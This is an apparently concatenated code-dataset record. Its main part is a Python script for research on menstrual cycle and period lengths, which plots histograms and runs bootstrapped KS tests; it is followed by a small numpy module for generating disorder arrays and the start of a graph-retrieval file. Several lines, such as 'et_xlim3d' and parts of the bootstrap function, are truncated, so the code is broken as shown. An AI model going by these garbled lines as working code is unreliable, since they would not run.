plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Plot for max intercycle length (i.e., CLD) histogram
def plot_max_intercycle_length_hists(cycle_stats, cycle_stats_exclude_flagged, save_dir):
'''
Function that plots max inter cycle length (max CLD) histograms with and without excluded cycles
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
cycle_stats_exclude_flagged: pandas dataframe for users after removing excluded flags, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
my_bins=np.arange(min(cycle_stats['max_inter_cycle_length']), max(cycle_stats['max_inter_cycle_length']) + 1)
plt.hist(cycle_stats['max_inter_cycle_length'], bins=my_bins, label='With behaviorally-tainted cycles', color='blue', histtype='step')
plt.hist(cycle_stats_exclude_flagged['max_inter_cycle_length'], bins=my_bins, label='Excluding behaviorally-tainted cycles', color='red', histtype='step')
plt.autoscale(enable=True, tight=True, axis='x')
plt.ylim(0,38000)
plt.xlabel('Maximum CLD in days')
plt.ylabel('User count with maximum CLD')
plt.savefig('{}/hist_max_inter_cycle_length_with_and_without_excluded_flags.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
# Plot for median Vs max intercycle length (i.e., CLD) histogram
def plot_median_vs_max_intercycle_length(cycle_stats, save_dir):
'''
Function that plots median Vs max inter cycle length (CLD) 2D scatter histogram
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
plt.hist2d(cycle_stats['median_inter_cycle_length'], cycle_stats['max_inter_cycle_length'], bins=(75, 75), cmap='jet', norm=colors.LogNorm())
plt.autoscale(enable=True, tight=True)
range_vals_median = np.linspace(min(cycle_stats['median_inter_cycle_length']), max(cycle_stats['median_inter_cycle_length']), 100)
plt.plot(range_vals_median, range_vals_median+10, label='Median CLD + 10', color='red')
plt.xlabel('Median CLD')
plt.ylabel('Maximum CLD')
plt.xlim((0,75))
plt.ylim((0, 75))
plt.colorbar()
plt.savefig('{}/median_vs_max_scatter_2d_hist.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
# Plot for median intercycle length (i.e., CLD) histogram
def plot_median_CLD_hist(cycle_stats, pdf_or_cdf, save_dir):
'''
Function that plots median CLD histograms
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Median CLD histogram
my_bins=np.arange(cycle_stats['median_inter_cycle_length'].dropna().min(),cycle_stats['median_inter_cycle_length'].dropna().max()+1)
all_counts, all_bins = np.histogram(cycle_stats['median_inter_cycle_length'].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Median CLD = n)'
cohort_filename = '{}/median_CLD_pdf_cohort.pdf'.format(save_dir)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Median CLD $\leq$ n)'
cohort_filename = '{}/median_CLD_cdf_cohort.pdf'.format(save_dir)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Actual plot
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xlabel('Median CLD in days')
plt.ylabel('P(Median CLD $\leq$ n)')
plt.grid(True)
plt.savefig('{}/median_CLD_cdf.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
################################## MAIN ############################
def main():
'''
Main function of the script that runs the cycle and period length related analysis
Input:
None
Output:
None
'''
### Directories
data_dir='../data'
preprocessed_data_dir='../preprocessed_data'
results_dir = '../results/characterizing_cycle_and_symptoms/cycle_period_length_analysis'
os.makedirs(results_dir, exist_ok = True)
################# SYMPTOMS TRACKED #################
# Tracking
with open('{}/tracking_enriched.pickle'.format(data_dir), 'rb') as f:
tracking = pickle.load(f)
print('Tracking-data loaded')
################# CYCLES #################
with open('{}/cohort_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycle_stats = pickle.load(f)
# Cycles flagged
with open('{}/cohort_cycles_flagged.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycles_flagged = pickle.load(f)
# Exclude cycles flagged as badly tracked
cohort_cycles = cohort_cycles_flagged[cohort_cycles_flagged['badly_tracked_cycle'] == 'f']
# Cycles stats
with open('{}/cohort_clean_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_clean_cycle_stats = pickle.load(f)
print('Cycles-data loaded')
################# PLOTTING #################
#### PLOT histogram of max intercycle length, with and without excluding flagged cycles
plot_max_intercycle_length_hists(cohort_cycle_stats, cohort_clean_cycle_stats, results_dir)
#### PLOT Median Vs Max CLD 2D histogram
plot_median_vs_max_intercycle_length(cohort_clean_cycle_stats, results_dir)
#### PLOT Median CLD histogram
plot_median_CLD_hist(cohort_clean_cycle_stats, 'cdf', results_dir)
#### PLOT cycle and period length histograms: pdf
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
#### Bootstrapped-KS cycle and period length
bootstrapped_cycle_period_lengths_KS(cohort_clean_cycle_stats, cohort_cycles, 'median_inter_cycle_length', 9, 100000, results_dir)
#### PLOT average cycle and average length over cycle-id
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, results_dir)
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, results_dir)
#### PLOT random cycle length time-series
random_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, results_dir)
#### PLOT population level cycle and period length time-series
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'period_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
# Making sure the main program is not executed when the module is imported
if __name__ == '__main__':
# Just run the main
main()
| 55.325733
| 257
| 0.68222
|
import sys, os, re, time
import argparse
import pdb
import pickle
from itertools import *
import numpy as np
import scipy.stats as stats
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
lim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
et_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
ax.text2D(12, 7,'(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
def random_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, save_dir):
cycle_stats_df_median = cycle_stats_df[cycle_stats_df['num_cycles_tracked'] == 11]
filename = '{}/random_time_series_embedding_for_{}_split_by_{}_{}.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
cycle_stats_df_greater_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
cycle_lengths_greater_than_user = np.random.choice(cycle_lengths_greater_than, size=1, replace=False)
cycle_lengths_less_than_user = np.random.choice(cycle_lengths_less_than, size=1, replace=False)
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = list(cycle_lengths_greater_than_user[0][0:-2])
ys = list(cycle_lengths_greater_than_user[0][1:-1])
zs = list(cycle_lengths_greater_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'orange')
ax.plot(xs, ys, zs, color='orange', linestyle='dashed', alpha=0.8)
xs = list(cycle_lengths_less_than_user[0][0:-2])
ys = list(cycle_lengths_less_than_user[0][1:-1])
zs = list(cycle_lengths_less_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'c')
ax.plot(xs, ys, zs, color='c', linestyle='dashed', alpha=0.8)
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
et_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
et_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
def plot_lengths_hist_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, pdf_or_cdf, save_dir):
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['orange', 'c']
labels=['Highly variable', 'NOT highly variable']
if attribute == 'cycle_length':
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
if pdf_or_cdf=='pdf':
hist_type='stepfilled'
cumulative=False
y_label='P(Cycle length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
hist_type='step'
cumulative=True
y_label='P(Cycle length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
max_period_days=28
if pdf_or_cdf=='pdf':
hist_type='stepfilled'
cumulative=False
y_label='P(Period length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
hist_type='step'
cumulative=True
y_label='P(Period length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
def bootstrapped_cycle_period_lengths_KS(cycle_stats_df, cycle_df, cutoff_criteria, cutoff, n_bootstrapping, results_dir):
true_users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
true_users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
n_users_greater_than_cutoff=true_users_greater_than_cutoff.size
n_users_less_than_cutoff=true_users_less_than_cutoff.size
ats.ks_2samp(true_cycles_users_greater_than_cutoff['period_length'].dropna(), true_cycles_users_less_than_cutoff['period_length'].dropna())
ce(true_users_less_than_cutoff,n_bootstrapping)
bootstrapped_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_greater_than_cutoff)]
bootstrapped_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_less_than_cutoff)]
bootstrapped_KS_cycle_length[n_bootstrap], bootstrapped_p_val_cycle_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['cycle_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['cycle_length'].dropna())
bootstrapped_KS_period_length[n_bootstrap], bootstrapped_p_val_period_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['period_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['period_length'].dropna())
print('*************************************************************************')
print('******** Cycle-length KS={} (p={}) ***********'.format(true_KS_cycle_length, true_p_val_cycle_length))
print('******** Cycle-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), bootstrapped_KS_cycle_length.std(), bootstrapped_p_val_cycle_length.mean(), bootstrapped_p_val_cycle_length.std()
))
print('******** Cycle-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), np.percentile(bootstrapped_KS_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_KS_cycle_length, 97.5, axis=0),
bootstrapped_p_val_cycle_length.mean(), np.percentile(bootstrapped_p_val_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_cycle_length, 97.5, axis=0)
))
print('*************************************************************************')
print('******** Period-length KS={} (p={}) ***********'.format(true_KS_period_length, true_p_val_period_length))
print('******** Period-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_period_length.mean(), bootstrapped_KS_period_length.std(), bootstrapped_p_val_period_length.mean(), bootstrapped_p_val_period_length.std()
))
print('******** Period-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_period_length.mean(), np.percentile(bootstrapped_KS_period_length, 2.5, axis=0), np.percentile(bootstrapped_KS_period_length, 97.5, axis=0),
bootstrapped_p_val_period_length.mean(), np.percentile(bootstrapped_p_val_period_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_period_length, 97.5, axis=0)
))
print('*************************************************************************')
def plot_avg_lengths_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, save_dir):
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['slateblue', 'c', 'orange']
max_cycle_id=20
if attribute == 'cycle_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Cycle length')
axes[index].set_ylim(20,55)
plt.text(12, 7, '(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Period length')
axes[index].set_ylim(1,9)
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
def plot_max_intercycle_length_hists(cycle_stats, cycle_stats_exclude_flagged, save_dir):
my_bins=np.arange(min(cycle_stats['max_inter_cycle_length']), max(cycle_stats['max_inter_cycle_length']) + 1)
plt.hist(cycle_stats['max_inter_cycle_length'], bins=my_bins, label='With behaviorally-tainted cycles', color='blue', histtype='step')
plt.hist(cycle_stats_exclude_flagged['max_inter_cycle_length'], bins=my_bins, label='Excluding behaviorally-tainted cycles', color='red', histtype='step')
plt.autoscale(enable=True, tight=True, axis='x')
plt.ylim(0,38000)
plt.xlabel('Maximum CLD in days')
plt.ylabel('User count with maximum CLD')
plt.savefig('{}/hist_max_inter_cycle_length_with_and_without_excluded_flags.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
def plot_median_vs_max_intercycle_length(cycle_stats, save_dir):
plt.hist2d(cycle_stats['median_inter_cycle_length'], cycle_stats['max_inter_cycle_length'], bins=(75, 75), cmap='jet', norm=colors.LogNorm())
plt.autoscale(enable=True, tight=True)
range_vals_median = np.linspace(min(cycle_stats['median_inter_cycle_length']), max(cycle_stats['median_inter_cycle_length']), 100)
plt.plot(range_vals_median, range_vals_median+10, label='Median CLD + 10', color='red')
plt.xlabel('Median CLD')
plt.ylabel('Maximum CLD')
plt.xlim((0,75))
plt.ylim((0, 75))
plt.colorbar()
plt.savefig('{}/median_vs_max_scatter_2d_hist.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
def plot_median_CLD_hist(cycle_stats, pdf_or_cdf, save_dir):
my_bins=np.arange(cycle_stats['median_inter_cycle_length'].dropna().min(),cycle_stats['median_inter_cycle_length'].dropna().max()+1)
all_counts, all_bins = np.histogram(cycle_stats['median_inter_cycle_length'].dropna(), bins=my_bins, density=True)
if pdf_or_cdf=='pdf':
hist_type='stepfilled'
cumulative=False
y_label='P(Median CLD = n)'
cohort_filename = '{}/median_CLD_pdf_cohort.pdf'.format(save_dir)
elif pdf_or_cdf=='cdf':
hist_type='step'
cumulative=True
y_label='P(Median CLD $\leq$ n)'
cohort_filename = '{}/median_CLD_cdf_cohort.pdf'.format(save_dir)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xlabel('Median CLD in days')
plt.ylabel('P(Median CLD $\leq$ n)')
plt.grid(True)
plt.savefig('{}/median_CLD_cdf.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
| true
| true
|
f70b6edc5aee3ac2d67c6163cc07e8550165c5db
| 4,030
|
py
|
Python
|
cmpy/disorder.py
|
dylanljones/cmpy
|
21adcf4dd9f873ae29d47aeaef4fbcd914bfce2c
|
[
"MIT"
] | 2
|
2021-11-17T13:39:37.000Z
|
2021-12-14T09:30:57.000Z
|
cmpy/disorder.py
|
dylanljones/cmpy
|
21adcf4dd9f873ae29d47aeaef4fbcd914bfce2c
|
[
"MIT"
] | null | null | null |
cmpy/disorder.py
|
dylanljones/cmpy
|
21adcf4dd9f873ae29d47aeaef4fbcd914bfce2c
|
[
"MIT"
] | null | null | null |
# coding: utf-8
#
# This code is part of cmpy.
#
# Copyright (c) 2022, Dylan Jones
"""This module contains methods for modeling disorder."""
import numpy as np
from typing import Union, Sequence
def create_subst_array(
size: int, values: Sequence[float], conc: Union[float, Sequence[float]]
) -> np.ndarray:
"""Creates an (ordered) array of values.
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
Returns
-------
array : np.ndarray
The (ordered) array filled with the given values.
"""
# Get sizes of sub-arrays
if isinstance(conc, float):
conc = [conc, 1 - conc]
if sum(conc) != 1:
raise ValueError("Fractions have to add up to 1!")
sizes = (size * np.array(conc)).astype(np.int64)
sizes[-1] += size - sum(sizes)
# create sub-arrays
arrays = [np.full(size, val) for size, val in zip(sizes, values)]
return np.concatenate(arrays)
def random_permutations(
arr: Sequence[float], size: int, replace: bool = False, seed: int = None
):
"""Creates (optionally unique) permutations of a given array.
Parameters
----------
arr : (N) np.ndarray
The input array to permute.
size : int
The number of permutations to generate.
replace : bool, optional
If `True`, only unique permutations are returned. The default is `True`.
seed : int, optional
A optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The permuted array.
Examples
--------
>>> a = [0, 0, 1, 1, 1]
>>> perm = random_permutations(a, size=2, seed=0)
>>> next(perm)
array([1, 1, 1, 0, 0])
>>> next(perm)
array([0, 1, 1, 1, 0])
"""
rng = np.random.default_rng(seed)
p = np.array(arr)
seen = set()
count = 0
while True:
if count >= size:
break
rng.shuffle(p)
if not replace:
phash = hash(p.data.tobytes())
if phash not in seen:
seen.add(phash)
yield p
count += 1
else:
yield p
count += 1
def disorder_generator(
size: int,
values: Sequence[float],
conc: Union[float, Sequence[float]],
samples: int,
replace: bool = False,
seed=None,
):
"""Generates (optionally unique) random samples from a given 1-D array.
See Also
--------
random_permutations
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
samples : int
The number of random arrays to generate.
replace : bool, optional
If `True`, only unique permutations are returned. The default is `True`.
seed : int, optional
A optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The randomly sampled arrays.
Examples
--------
>>> eps = disorder_generator(5, values=[0, +1], conc=[0.4, 0.6], samples=2, seed=0)
>>> next(eps)
array([1, 1, 1, 0, 0])
>>> next(eps)
array([0, 1, 1, 1, 0])
"""
ordered = create_subst_array(size, values, conc)
return random_permutations(ordered, samples, replace, seed)
| 28.181818
| 88
| 0.600744
|
import numpy as np
from typing import Union, Sequence
def create_subst_array(
size: int, values: Sequence[float], conc: Union[float, Sequence[float]]
) -> np.ndarray:
if isinstance(conc, float):
conc = [conc, 1 - conc]
if sum(conc) != 1:
raise ValueError("Fractions have to add up to 1!")
sizes = (size * np.array(conc)).astype(np.int64)
sizes[-1] += size - sum(sizes)
arrays = [np.full(size, val) for size, val in zip(sizes, values)]
return np.concatenate(arrays)
def random_permutations(
arr: Sequence[float], size: int, replace: bool = False, seed: int = None
):
rng = np.random.default_rng(seed)
p = np.array(arr)
seen = set()
count = 0
while True:
if count >= size:
break
rng.shuffle(p)
if not replace:
phash = hash(p.data.tobytes())
if phash not in seen:
seen.add(phash)
yield p
count += 1
else:
yield p
count += 1
def disorder_generator(
size: int,
values: Sequence[float],
conc: Union[float, Sequence[float]],
samples: int,
replace: bool = False,
seed=None,
):
ordered = create_subst_array(size, values, conc)
return random_permutations(ordered, samples, replace, seed)
| true
| true
|
f70b708bbdac7d2781674c92fd8e90e059902171
| 3,501
|
py
|
Python
|
bindings/python/ensmallen/datasets/string/sphingomonashankookensis.py
|
AnacletoLAB/ensmallen
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 5
|
2021-09-10T18:31:58.000Z
|
2022-03-24T04:28:04.000Z
|
bindings/python/ensmallen/datasets/string/sphingomonashankookensis.py
|
AnacletoLAB/ensmallen_graph
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 18
|
2021-01-07T16:47:39.000Z
|
2021-08-12T21:51:32.000Z
|
bindings/python/ensmallen/datasets/string/sphingomonashankookensis.py
|
AnacletoLAB/ensmallen
|
b2c1b18fb1e5801712852bcc239f239e03076f09
|
[
"MIT"
] | 3
|
2021-01-14T02:20:59.000Z
|
2021-08-04T19:09:52.000Z
|
"""
This file offers the methods to automatically retrieve the graph Sphingomonas hankookensis.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
